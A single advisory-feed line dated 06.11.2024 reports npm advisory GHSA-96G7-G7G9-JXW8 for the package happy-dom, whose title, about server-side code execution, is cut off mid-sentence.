06.11.2024 17:27:51	npm	[NPM:GHSA-96G7-G7G9-JXW8] happy-dom allows for server side code to be executed by a